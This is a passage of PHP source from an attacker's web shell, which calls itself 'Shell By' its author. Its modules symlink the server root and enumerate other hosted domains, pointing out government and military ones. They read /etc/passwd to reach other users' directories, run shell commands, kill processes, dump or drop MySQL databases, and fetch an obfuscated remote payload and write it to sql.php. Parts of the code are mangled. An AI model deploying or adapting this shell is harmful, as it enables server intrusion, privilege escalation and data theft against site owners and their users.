"; $total=0; $no=1; foreach($read_named_conf as $subject) { if(eregi('zone',$subject)) { preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0]))>2) { $UID=posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name=$UID['name']; @symlink('/','sym/root'); $name=$string[1][0]; $iran='\.ir'; $israel='\.il'; $indo='\.id'; $sg12='\.sg'; $edu='\.edu'; $gov='\.gov'; $gose='\.go'; $gober='\.gob'; $mil1='\.mil'; $mil2='\.mi'; $malay='\.my'; $china='\.cn'; $japan='\.jp'; $austr='\.au'; $porn='\.xxx'; $as='\.uk'; $calfn='\.ca'; if(eregi("$iran",$string[1][0])oreregi("$israel",$string[1][0])oreregi("$indo",$string[1][0])oreregi("$sg12",$string[1][0])oreregi("$edu",$string[1][0])oreregi("$gov",$string[1][0])oreregi("$gose",$string[1][0])oreregi("$gober",$string[1][0])oreregi("$mil1",$string[1][0])oreregi("$mil2",$string[1][0])oreregi("$malay",$string[1][0])oreregi("$china",$string[1][0])oreregi("$japan",$string[1][0])oreregi("$austr",$string[1][0])oreregi("$porn",$string[1][0])oreregi("$as",$string[1][0])oreregi("$calfn",$string[1][0])) { $name="
".$string[1][0].'
'; } echo " "; $total++; flush(); } } } echo "
NoDomainsUsersSymlink
".$no++."
'.$name.'
'.$UID['name']."Symlink
TotalsFounded ".$total." Users For Symlink
"; } } else { echo "
[Symlink] : Can't Read -> [ /etc/named.conf ]
"; } echo "
"; } elseif(isset($_GET['x'])&&($_GET['x']=='jumpings')) { echo "

";($sm=ini_get('safe_mode')==0)?$sm='off':die("[Error] : Safemode = ON

[ Shell By ".$xName." ]
Allright Reserved © ".date("Y",time())." ".$xName."
"); set_time_limit(0); @$passwd=fopen('/etc/passwd','r'); if(!$passwd) { die("[Error] : Can't Read -> [ /etc/passwd ]

[ Shell By ".$xName." ]
Allright Reserved © ".date("Y",time())." ".$xName."
"); } else { $pubs=array(); $users=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if($i>100) { $pos=strpos($str,':'); $usr=explode(":",$str); $username=substr($str,0,$pos); $dirz=$usr[5]; if(($username!='')) { if(is_readable($dirz)) { array_push($users,$username); array_push($pubs,$dirz); } } } $i++; } echo "
"; $total=0; $no=1; foreach(array_combine($users,$pubs) as $user=>$pub) { echo ''; $total++; } echo "
NoUsersPathJumping
'.$no++.''.$user.''.$pub.'Jumping
TotalsFounded ".$total." Users For Jumping
"; } } elseif(isset($_GET['x'])&&($_GET['x']=='jumping')) { echo "

";($sm=ini_get('safe_mode')==0)?$sm='off':die("[Error] : Safemode = ON

[ Shell By ".$xName." ]
Allright Reserved © ".date("Y",time())." ".$xName."
"); set_time_limit(0); @$passwd=fopen('/etc/passwd','r'); if(!$passwd) { die("[Error] : Can't Read -> [ /etc/passwd ]

[ Shell By ".$xName." ]
Allright Reserved © ".date("Y",time())." ".$xName."
"); } else { $pub=array(); $users=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if($i>100) { $pos=strpos($str,':'); $username=substr($str,0,$pos); $dirz='/home/'.$username.'/public_html/'; if(($username!='')) { if(is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo "
"; $total=0; $no=1; foreach($users as $user) { echo ''; $total++; } echo "
NoUsersPathJumping
'.$no++.''.$user.'/home/'.$user.'/public_html/Jumping
TotalsFounded ".$total." Users For Jumping
"; } } elseif(isset($_GET['x'])&&($_GET['x']=='processes')) { echo "
"; function getdisfunc() { $disfunc=@ini_get("disable_functions"); if(!empty($disfunc)) { $disfunc=str_replace(" ","",$disfunc); $disfunc=explode(",",$disfunc); } else { $disfunc=array(); } return $disfunc; } function enabled($func) { if(function_exists($func)&&is_callable($func)&&!in_array($func,getdisfunc())) { return TRUE; } else { return FALSE; } } function fx29exec($cmd) { $output=""; if(enabled("popen")) { $h=popen($cmd.' 2>&1','r'); if(is_resource($h)) { while(!feof($h)) { $output.=fread($h,2096); } pclose($h); } } elseif(enabled("passthru")) { @ob_start(); passthru($cmd); $output=@ob_get_contents(); @ob_end_clean(); } elseif(enabled("system")) { @ob_start(); system($cmd); $output=@ob_get_contents(); @ob_end_clean(); } elseif(enabled("exec")) { exec($cmd,$o); $output=join("\r\n",$o); } elseif(enabled("shell_exec")) { $output=shell_exec($cmd); } return $output; } function fx29exec2($cmd) { $output=""; if(enabled("shell_exec")) { $output=shell_exec($cmd); } elseif(enabled("exec")) { exec($cmd,$o); $output=join("\r\n",$o); } elseif(enabled("system")) { @ob_start(); system($cmd); $output=@ob_get_contents(); @ob_end_clean(); } elseif(enabled("passthru")) { @ob_start(); passthru($cmd); $output=@ob_get_contents(); @ob_end_clean(); } elseif(enabled("popen")) { $h=popen($cmd.' 2>&1','r'); if(is_resource($h)) { while(!feof($h)) { $output.=fread($h,2096); } pclose($h); } } return $output; } function is_windows() { return strtolower(substr(PHP_OS,0,3))=="win"; } function tabsort($a,$b) { global $v; return strnatcmp($a[$v],$b[$v]); } function parsesort($sort) { $one=intval($sort); $second=substr($sort,-1); if($second!="d") { $second="a"; } return array($one,$second); } function disp_error($msg) { echo "
$msg
\n"; } $auto_surl=TRUE; foreach($_REQUEST as $k=>$v) { if(!isset($$k)) { $$k=$v; } } if($auto_surl) { $include="&"; foreach(explode("&",getenv("QUERY_STRING")) as $v) { $v=explode("=",$v); $name=urldecode($v[0]); $value=@urldecode($v[1]); $needles=array("http://","https://","ssl://","ftp://","\\\\"); foreach($needles as $needle) { if(strpos($value,$needle)===0) { $includestr.=urlencode($name)."=".urlencode($value)."&"; } } } } if(empty($surl)) { $surl=htmlspecialchars("?".@$includestr); } if(!isset($x)) { $x="processes"; } if($x=="processes") { if(!is_windows()) { $handler="ps aux".($grep?" | grep '".addslashes($grep)."'":""); } else { $handler="tasklist"; } $ret=fx29exec($handler); if(!$ret) { disp_error("
[Process] : Can't Execute \"$handler\"
"); } else { if(empty($processes_sort)) { $processes_sort=$sort_default; } $parsesort=parsesort($processes_sort); if(!is_numeric($parsesort[0])) { $parsesort[0]=0; } $k=$parsesort[0]; if($parsesort[1]!="a") { $y=" \"Asc\""; } else { $y=" \"Dsc\""; } $ret=htmlspecialchars($ret); if(!is_windows()) { if($pid) { if(is_null($sig)) { $sig=9; } echo "
[Kill] : Sending signal ".$sig." to #".$pid."... "; if(posix_kill($pid,$sig)) { echo "OK!"; } else { echo "ERROR!"; } echo "
"; } while(ereg(" ",$ret)) { $ret=str_replace(" "," ",$ret); } $stack=explode("\n",$ret); $head=explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i".$head[$i]."
"; } } $head[$i]="
KILL
"; $prcs=array(); foreach($stack as $line) { if(!empty($line)) { $line=explode(" ",$line); $line[10]=join(" ",array_slice($line,10)); $line=array_slice($line,0,11); if($line[0]==get_current_user()) { $line[0]="".$line[0].""; } $line[]="
KILL
"; $prcs[]=$line; } } } else { if(@$pid) { echo "
[Kill] : Killing PID ".$pid."... "; echo fx29exec("taskkill /PID $pid /F"); echo "
"; } while(ereg(" ",$ret)) { $ret=str_replace(" "," ",$ret); } while(ereg("=",$ret)) { $ret=str_replace("=","",$ret); } $ret=convert_cyr_string($ret,"d","w"); $stack=explode("\n",$ret); unset($stack[0],$stack[2]); $stack=array_values($stack); $stack[0]=str_replace("Image Name","Image-Name",$stack[0]); $stack[0]=str_replace("Session Name","Session-Name",$stack[0]); $stack[0]=str_replace("Mem Usage","Memory-Usage",$stack[0]); $stack[0].=" KILL"; $head=explode(" ",$stack[0]); $stack=array_slice($stack,1); $head=array_values($head); if($parsesort[1]!="a") { $y=" \"Asc\""; } else { $y=" \"Dsc\""; } if($k>count($head)) { $k=count($head)-1; } for($i=0;$i".trim($head[$i]).""; } } $prcs=array(); unset($stack[0]); foreach($stack as $line) { if(!empty($line)) { $line=explode(" ",$line); $line[4]=str_replace(".","",$line[4]); $line[4]=intval($line[4])*1024; unset($line[5]); $line[]="
KILL
"; $prcs[]=$line; } } } $head[$k]="
".$head[$k].$y."
"; $v=$processes_sort[0]; usort($prcs,"tabsort"); if($processes_sort[1]=="d") { $prcs=array_reverse($prcs); } $tab=array(); $tab[]=$head; $tab=array_merge($tab,$prcs); echo "
\n"; foreach($tab as $i=>$k) { echo "\t"; foreach($k as $j=>$v) { if(is_windows()and$i>0and$j==4) { $v=view_size($v); } echo ""; } echo "\n"; } echo "
".$v."
\n"; } } } elseif(isset($_GET['x'])&&($_GET['x']=='sql')) { echo "
"; function strips(&$arr,$k="") { if(is_array($arr)) { foreach($arr as $k=>$v) { if(strtoupper($k)!="GLOBALS") { strips($arr["$k"]); } } } else { $arr=stripslashes($arr); } } function mysql_dump($set) { $sock=$set["sock"]; $db=$set["db"]; $print=$set["print"]; $nl2br=$set["nl2br"]; $file=$set["file"]; $add_drop=$set["add_drop"]; $tabs=$set["tabs"]; $onlytabs=$set["onlytabs"]; $ret=array(); $ret["err"]=array(); if(!is_resource($sock)) { echo("Error: \$sock is not valid resource."); } if(empty($db)) { $db="db"; } if(empty($print)) { $print=0; } if(empty($nl2br)) { $nl2br=0; } if(empty($add_drop)) { $add_drop=TRUE; } if(empty($file)) { $file=$tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if(!is_array($tabs)) { $tabs=array(); } if(empty($add_drop)) { $add_drop=TRUE; } if(sizeof($tabs)==0) { $res=mysql_query("SHOW TABLES FROM ".$db,$sock); if(mysql_num_rows($res)>0) { while($row=mysql_fetch_row($res)) { $tabs[]=$row[0]; } } } $out=" # Dumped By S4MP4H # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." # Date: ".date("d.m.Y H:i:s")." # DB: \"".$db."\" #---------------------------------------------------------------------------------\n"; $c=count($onlytabs); foreach($tabs as $tab) { if((in_array($tab,$onlytabs))or(!$c)) { if($add_drop) { $out.="DROP TABLE IF EXISTS `".$tab."`;\n"; } $res=mysql_query("SHOW CREATE TABLE `".$tab."`",$sock); if(!$res) { $ret["err"][]=mysql_smarterror(); } else { $row=mysql_fetch_row($res); $out.=$row["1"].";\n\n"; $res=mysql_query("SELECT * FROM `$tab`",$sock); if(mysql_num_rows($res)>0) { while($row=mysql_fetch_assoc($res)) { $keys=implode("`, `",array_keys($row)); $values=array_values($row); foreach($values as $k=>$v) { $values[$k]=addslashes($v); } $values=implode("', '",$values); $sql="INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out.=$sql; } } } } } $out.="#---------------------------------------------------------------------------------\n"; if($file) { $fp=fopen($file,"w"); if(!$fp) { $ret["err"][]=2; } else { fwrite($fp,$out); fclose($fp); } } if($print) { if($nl2br) { echo nl2br($out); } else { echo $out; } } return $out; } function mysql_buildwhere($array,$sep=" and",$functs=array()) { if(!is_array($array)) { $array=array(); } $result=""; foreach($array as $k=>$v) { $value=""; if(!empty($functs[$k])) { $value.=$functs[$k]."("; } $value.="'".addslashes($v)."'"; if(!empty($functs[$k])) { $value.=")"; } $result.="`".$k."` = ".$value.$sep; } $result=substr($result,0,strlen($result)-strlen($sep)); return $result; } function mysql_fetch_all($query,$sock) { if($sock) { $result=mysql_query($query,$sock); } else { $result=mysql_query($query); } $array=array(); while($row=mysql_fetch_array($result)) { $array[]=$row; } mysql_free_result($result); return $array; } function mysql_smarterror($sock) { if($sock) { $error=mysql_error($sock); } else { $error=mysql_error(); } $error=htmlspecialchars($error); return $error; } function mysql_query_form() { global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if(($submit)and(!$sql_query_result)and($sql_confirm)) { if(!$sql_query_error) { $sql_query_error="Query was empty"; } echo "Error:
".$sql_query_error."
"; } if($sql_query_resultor(!$sql_confirm)) { $sql_x=$sql_goto; } if((!$submit)or($sql_x)) { echo ""; if($tbl_struct) { echo "
"; if(($sql_query)and(!$submit)) { echo "Do you really want to"; } else { echo "SQL-Query"; } echo ":



Fields:
"; foreach($tbl_struct as $field) { $name=$field["Field"]; echo "+ ".$name."
"; } echo "
"; } } if($sql_query_resultor(!$sql_confirm)) { $sql_query=$sql_last_query; } } function mysql_create_db($db,$sock="") { $sql="CREATE DATABASE `".addslashes($db)."`;"; if($sock) { return mysql_query($sql,$sock); } else { return mysql_query($sql); } } function mysql_query_parse($query) { $query=trim($query); $arr=explode(" ",$query); $types=array("SELECT"=>array(3,1),"SHOW"=>array(2,1),"DELETE"=>array(1),"DROP"=>array(1)); $result=array(); $op=strtoupper($arr[0]); if(is_array($types[$op])) { $result["propertions"]=$types[$op]; $result["query"]=$query; if($types[$op]==2) { foreach($arr as $k=>$v) { if(strtoupper($v)=="LIMIT") { $result["limit"]=$arr[$k+1]; $result["limit"]=explode(",",$result["limit"]); if(count($result["limit"])==1) { $result["limit"]=array(0,$result["limit"][0]); } unset($arr[$k],$arr[$k+1]); } } } } else { return FALSE; } } function disp_error($msg) { echo "
$msg
\n"; } function html_style() { $style='
'; return $style; } $auto_surl=TRUE; @set_magic_quotes_runtime(0); if(get_magic_quotes_gpc()) { strips($GLOBALS); } foreach($_REQUEST as $k=>$v) { if(!isset($$k)) { $$k=$v; } } if($auto_surl) { $include="&"; foreach(explode("&",getenv("QUERY_STRING")) as $v) { $v=explode("=",$v); $name=urldecode($v[0]); $value=@urldecode($v[1]); $needles=array("http://","https://","ssl://","ftp://","\\\\"); foreach($needles as $needle) { if(strpos($value,$needle)===0) { $includestr.=urlencode($name)."=".urlencode($value)."&"; } } } } if(empty($surl)) { $surl=htmlspecialchars("?".@$includestr); } if(!isset($x)) { $x="sql"; } if($x=="sql") { foreach(array("sort","sql_sort") as $v) { if(!empty($_GET[$v])) { $$v=$_GET[$v]; } if(!empty($_POST[$v])) { $$v=$_POST[$v]; } } if($sort_save) { if(!empty($sort)) { setcookie("sort",$sort); } if(!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); } } if(!isset($sort)) { $sort=$sort_default; } $sort=htmlspecialchars($sort); $sort[1]=strtolower($sort[1]); echo html_style(); echo "
"; if($x=="sql") { $sql_surl=$surl."x=sql"; if(!isset($sql_login)) { $sql_login=""; } if(!isset($sql_passwd)) { $sql_passwd=""; } if(!isset($sql_server)) { $sql_server=""; } if(!isset($sql_port)) { $sql_port=""; } if(!isset($sql_tbl)) { $sql_tbl=""; } if(!isset($sql_x)) { $sql_x=""; } if(!isset($sql_tbl_x)) { $sql_tbl_x=""; } if(!isset($sql_order)) { $sql_order=""; } if(!isset($sql_x)) { $sql_x=""; } if(!isset($sql_getfile)) { $sql_getfile=""; } if(@$sql_login) { $sql_surl.="&sql_login=".htmlspecialchars($sql_login); } if(@$sql_passwd) { $sql_surl.="&sql_passwd=".htmlspecialchars($sql_passwd); } if(@$sql_server) { $sql_surl.="&sql_server=".htmlspecialchars($sql_server); } if(@$sql_port) { $sql_surl.="&sql_port=".htmlspecialchars($sql_port); } if(@$sql_db) { $sql_surl.="&sql_db=".htmlspecialchars($sql_db); } $sql_surl.="&"; echo ""; if(@$sql_server) { $sql_sock=@mysql_connect($sql_server.":".$sql_port,$sql_login,$sql_passwd); $err=mysql_smarterror($sql_sock); @mysql_select_db($sql_db,$sql_sock); if(@$sql_queryand$submit) { $sql_query_result=mysql_query($sql_query,$sql_sock); $sql_query_error=mysql_smarterror($sql_sock); } } else { $sql_sock=FALSE; } if(!$sql_sock) { if(!@$sql_server) { if($_GET['ins']=="sql") { $sqlshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php'); $file=fopen("sql.php","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($sqlshell))))); fclose($file); chmod("sql.php",0644); echo "[Mysql] : Install Done, sql.php"; } else { echo "[Mysql] : No Connection, Bypass"; } } else { disp_error("ERROR: ".$err); } } else { $sqlquicklaunch=array(); $sqlquicklaunch[]=array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[]=array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[]=array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus"); $sqlquicklaunch[]=array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars"); $sqlquicklaunch[]=array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes"); $sqlquicklaunch[]=array("Logout",$surl."x=sql"); echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; if(count($sqlquicklaunch)>0) { foreach($sqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } } echo "
"; echo ""; if(!$sql_sock) { echo ''; echo ''; if($sql_sock) { $affected=@mysql_affected_rows($sql_sock); if((!is_numeric($affected))or($affected<0)) { $affected=0; } echo "\t"; } echo '
Mysql Manager
Username
Password
Database
Host
Port
'; } else { echo '
HOME
'; $result=mysql_list_dbs($sql_sock); if(!$result) { echo mysql_smarterror(); } else { echo '
'; if(isset($sql_db)) { $result=mysql_list_tables($sql_db); if(!$result) { $result=mysql_list_dbs($sql_sock); $num=mysql_num_rows($result); for($i=0;$i<$num;$i++) { $dbname=mysql_dbname($result,$i); echo "
+ $dbname
"; } } else { echo "\t
".htmlspecialchars($sql_db)."

\n"; $c=0; while($row=mysql_fetch_array($result)) { $count=mysql_query("SELECT COUNT(*) FROM ".$row[0]); $count_row=mysql_fetch_array($count); echo "\t+ ".htmlspecialchars($row[0])." (".$count_row[0].")
\n"; mysql_free_result($count); $c++; } if(!$c) { echo "No tables found in database"; } } } echo '		'; $diplay=TRUE; if(@$sql_db) { if(!is_numeric($c)) { $c=0; } if($c==0) { $c="no"; } echo "\t
There are ".$c." table(s) in database: ".htmlspecialchars($sql_db).""; if(count(@$dbquicklaunch)>0) { foreach($dbsqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } echo "
\n"; $xs=array("","dump"); if($sql_x=="tbldrop") { $sql_query="DROP TABLE"; foreach($boxtbl as $v) { $sql_query.="\n`".$v."` ,"; } $sql_query=substr($sql_query,0,-1).";"; $sql_x="query"; } elseif($sql_x=="tblempty") { $sql_query=""; foreach($boxtbl as $v) { $sql_query.="DELETE FROM `".$v."` \n"; } $sql_x="query"; } elseif($sql_x=="tbldump") { if(count($boxtbl)>0) { $dmptbls=$boxtbl; } elseif($thistbl) { $dmptbls=array($sql_tbl); } $sql_x="dump"; } elseif($sql_x=="tblcheck") { $sql_query="CHECK TABLE"; foreach($boxtbl as $v) { $sql_query.="\n`".$v."` ,"; } $sql_query=substr($sql_query,0,-1).";"; $sql_x="query"; } elseif($sql_x=="tbloptimize") { $sql_query="OPTIMIZE TABLE"; foreach($boxtbl as $v) { $sql_query.="\n`".$v."` ,"; } $sql_query=substr($sql_query,0,-1).";"; $sql_x="query"; } elseif($sql_x=="tblrepair") { $sql_query="REPAIR TABLE"; foreach($boxtbl as $v) { $sql_query.="\n`".$v."` ,"; } $sql_query=substr($sql_query,0,-1).";"; $sql_x="query"; } elseif($sql_x=="tblanalyze") { $sql_query="ANALYZE TABLE"; foreach($boxtbl as $v) { $sql_query.="\n`".$v."` ,"; } $sql_query=substr($sql_query,0,-1).";"; $sql_x="query"; } elseif($sql_x=="deleterow") { $sql_query=""; if(!empty($boxrow_all)) { $sql_query="DELETE * FROM `".$sql_tbl."`;"; } else { foreach($boxrow as $v) { $sql_query.="DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n"; } $sql_query=substr($sql_query,0,-1); } $sql_x="query"; } elseif($sql_tbl_x=="insert") { if($sql_tbl_insert_radio==1) { $keys=""; $akeys=array_keys($sql_tbl_insert); foreach($akeys as $v) { $keys.="`".addslashes($v)."`, "; } if(!empty($keys)) { $keys=substr($keys,0,strlen($keys)-2); } $values=""; $i=0; foreach(array_values($sql_tbl_insert) as $v) { if($funct=$sql_tbl_insert_functs[$akeys[$i]]) { $values.=$funct." ("; } $values.="'".addslashes($v)."'"; if($funct) { $values.=")"; } $values.=", "; $i++; } if(!empty($values)) { $values=substr($values,0,strlen($values)-2); } $sql_query="INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_x="query"; $sql_tbl_x="browse"; } elseif($sql_tbl_insert_radio==2) { $set=mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query="UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result=mysql_query($sql_query)orprint(mysql_smarterror()); $result=mysql_fetch_array($result,MYSQL_ASSOC); $sql_x="query"; $sql_tbl_x="browse"; } } if($sql_x=="query") { echo "
"; if(($submit)and(!$sql_query_result)and($sql_confirm)) { if(!$sql_query_error) { $sql_query_error="Query was empty"; } echo "Error:
".$sql_query_error."
"; } if($sql_query_resultor(!$sql_confirm)) { $sql_x=$sql_goto; } if((!$submit)or($sql_x)) { echo "
"; if(($sql_query)and(!$submit)) { echo "Do you really want to:"; } else { echo "SQL-Query :"; } echo "



"; } } if(in_array($sql_x,$xs)) { echo '
Create new table:
Fields:
Dump DB:
'; if(!empty($sql_x)) { echo "
"; } if($sql_x=="newtbl") { echo ""; if((mysql_create_db($sql_newdb))and(!empty($sql_newdb))) { echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
"; } else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_smarterror(); } } elseif($sql_x=="dump") { if(empty($submit)) { $diplay=FALSE; echo "
SQL-Dump:

"; echo "DB:

"; $v=join(";",$dmptbls); echo "Only tables (explode \";\") :

"; if($dump_file) { $tmp=$dump_file; } else { $tmp=htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"); } echo "File:

"; echo "Download:

"; echo "Save to file: "; echo "

"; echo "
"; } else { $diplay=TRUE; $set=array(); $set["sock"]=$sql_sock; $set["db"]=$sql_db; $dump_out="download"; $set["print"]=0; $set["nl2br"]=0; $set[""]=0; $set["file"]=$dump_file; $set["add_drop"]=TRUE; $set["onlytabs"]=array(); if(!empty($dmptbls)) { $set["onlytabs"]=explode(";",$dmptbls); } $ret=mysql_dump($set); if($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo '
'.$ret.'
'; exit; } elseif($sql_dump_savetofile) { $fp=fopen($sql_dump_file,"w"); if(!$fp) { echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!"; } else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else { echo "Dump: nothing to do!"; } } } if($diplay) { if(!empty($sql_tbl)) { if(empty($sql_tbl_x)) { $sql_tbl_x="browse"; } $count=mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row=mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result=mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields=array(); while($row=mysql_fetch_assoc($tbl_struct_result)) { $tbl_struct_fields[]=$row; } if(@$sql_ls>@$sql_le) { $sql_le=$sql_ls+$perpage; } if(empty($sql_tbl_page)) { $sql_tbl_page=0; } if(empty($sql_tbl_ls)) { $sql_tbl_ls=0; } if(empty($sql_tbl_le)) { $sql_tbl_le=30; } $perpage=$sql_tbl_le-$sql_tbl_ls; if(!is_numeric($perpage)) { $perpage=10; } $numpages=$count_row[0]/$perpage; $e=explode(" ",$sql_order); if(count($e)==2) { if($e[0]=="d") { $asc_desc="DESC"; } else { $asc_desc="ASC"; } $v="ORDER BY `".$e[1]."` ".$asc_desc." "; } else { $v=""; } $query="SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result=mysql_query($query)orprint(mysql_smarterror()); echo "
Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
"; echo "
"; echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "Insert ]   "; if($sql_tbl_x=="structure") { echo "Under construction!"; } if($sql_tbl_x=="insert") { if(!is_array($sql_tbl_insert)) { $sql_tbl_insert=array(); } if(!empty($sql_tbl_insert_radio)) { echo "Under construction!"; } else { echo "

Inserting row into table:
"; if(!empty($sql_tbl_insert_q)) { $sql_query="SELECT * FROM `".$sql_tbl."`"; $sql_query.=" WHERE".$sql_tbl_insert_q; $sql_query.=" LIMIT 1;"; $result=mysql_query($sql_query,$sql_sock)orprint("

".mysql_smarterror()); $values=mysql_fetch_assoc($result); mysql_free_result($result); } else { $values=array(); } echo "
"; foreach($tbl_struct_fields as $field) { $name=$field["Field"]; if(empty($sql_tbl_insert_q)) { $v=""; } echo ""; $i++; } echo "
FieldTypeFunctionValue
".htmlspecialchars($name)."".$field["Type"]."

"; echo "Insert as new row"; if(!empty($sql_tbl_insert_q)) { echo " or Save"; echo ""; } echo "

"; } } if($sql_tbl_x=="browse") { $sql_tbl_ls=abs($sql_tbl_ls); $sql_tbl_le=abs($sql_tbl_le); echo "
"; echo "Page: "; $b=0; for($i=0;$i<$numpages;$i++) { if(($i*$perpage!=$sql_tbl_ls)or($i*$perpage+$perpage!=$sql_tbl_le)) { echo ""; } echo $i; if(($i*$perpage!=$sql_tbl_ls)or($i*$perpage+$perpage!=$sql_tbl_le)) { echo ""; } if(($i/30==round($i/30))and($i>0)) { echo "
"; } else { echo " "; } } if($i==0) { echo "empty"; } echo "

From: To:
"; echo "
\n"; echo ""; echo ""; for($i=0;$i"; if(empty($e[0])) { $e[0]="a"; } if(@$e[1]!=$v) { echo "".$v.""; } else { echo "".$v."\"".$m."\""; } echo ""; } echo ""; echo ""; while($row=mysql_fetch_array($result,MYSQL_ASSOC)) { echo ""; $w=""; $i=0; foreach($row as $k=>$v) { $name=mysql_field_name($result,$i); $w.=" `".$name."` = '".addslashes($v)."' AND"; $i++; } if(count($row)>0) { $w=substr($w,0,strlen($w)-3); } echo ""; $i=0; foreach($row as $k=>$v) { $v=htmlspecialchars($v); if($v=="") { $v="NULL"; } echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
action
".$v.""; echo "Delete"; echo " | "; echo "Edit "; echo "

"; } } else { $result=mysql_query("SHOW TABLE STATUS",$sql_sock); if(!$result) { echo mysql_smarterror(); } else { echo '
'; $i=0; $tsize=$trows=0; while($row=mysql_fetch_array($result,MYSQL_ASSOC)) { $tsize+=$row["Data_length"]; $trows+=$row["Rows"]; $size=view_size($row["Data_length"]); echo ''; $i++; } echo "\t\t\n"."\t\t\n"; echo '
TableRowsEngineCreatedModifiedSizeAction
'.$row["Name"].' '.$row["Rows"].''.$row["Engine"].''.$row["Create_time"].''.$row["Update_time"].''.$size.' Empty | Drop | Insert
$i table(s)$trows$row[1]$row[10]$row[11]".view_size($tsize)."

'; mysql_free_result($result); } } } } } else { $xs=array("","newdb","serverstatus","servervars","processes","getfile"); if(in_array($sql_x,$xs)) { echo '
Create new DB:
View File:
'; } if(!empty($sql_x)) { echo "
"; if($sql_x=="newdb") { echo ""; if((mysql_create_db($sql_newdb))and(!empty($sql_newdb))) { echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
"; } else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_smarterror(); } } if($sql_x=="serverstatus") { $result=mysql_query("SHOW STATUS",$sql_sock); echo "
Server status variables:

"; echo ""; while($row=mysql_fetch_array($result,MYSQL_NUM)) { echo ""; } echo "
NameValue
".$row[0]."".$row[1]."
"; mysql_free_result($result); } if($sql_x=="servervars") { $result=mysql_query("SHOW VARIABLES",$sql_sock); echo "
Server variables:

"; echo ""; while($row=mysql_fetch_array($result,MYSQL_NUM)) { echo ""; } echo "
NameValue
".$row[0]."".$row[1]."
"; mysql_free_result($result); } if($sql_x=="processes") { if(!empty($kill)) { $query="KILL ".$kill.";"; $result=mysql_query($query,$sql_sock); echo "Process #".$kill." was killed."; } $result=mysql_query("SHOW PROCESSLIST",$sql_sock); echo "
Processes:

"; echo ""; while($row=mysql_fetch_array($result,MYSQL_NUM)) { echo ""; } echo "
IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
